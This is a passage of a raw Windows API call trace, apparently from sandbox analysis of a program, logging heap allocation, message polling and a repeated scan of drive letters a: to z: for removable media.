lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0212.639] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.640] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0212.640] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0212.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0212.640] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.640] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0212.640] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.640] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.640] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.641] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.641] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.641] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.641] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.641] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.641] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.641] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.642] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.642] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.642] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.642] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.642] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.642] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.642] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.643] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.643] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.643] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.643] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.643] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.643] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.643] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.644] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.644] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.644] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.644] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0212.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0212.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0212.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.645] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0212.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0212.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0212.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0212.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0212.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0212.645] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0212.645] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.645] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0212.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0212.645] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0212.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.645] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0212.646] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0212.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.646] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.646] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.646] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.647] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.647] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.647] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.647] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.647] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.647] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.647] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.648] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.648] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.648] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.648] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.648] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.648] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.649] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.649] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.649] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.649] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.649] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.649] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.650] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.650] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.650] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.650] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.650] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0212.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.651] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e00 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e00 | out: hHeap=0x12c0000) returned 1 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0212.651] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0212.651] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0212.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0212.652] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0212.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0212.652] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.652] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.652] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0212.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.652] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.653] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.653] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.653] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.653] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.653] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.653] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.653] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.654] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.654] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.654] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.654] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.654] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.226] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.227] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.227] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.227] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.228] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.228] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.228] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.228] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.228] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.229] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.229] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.229] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.229] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.230] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0213.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.231] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.231] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0213.231] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0213.231] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0213.231] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0213.231] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0213.231] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0213.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0213.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0213.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0213.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0213.232] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0213.232] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0213.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: 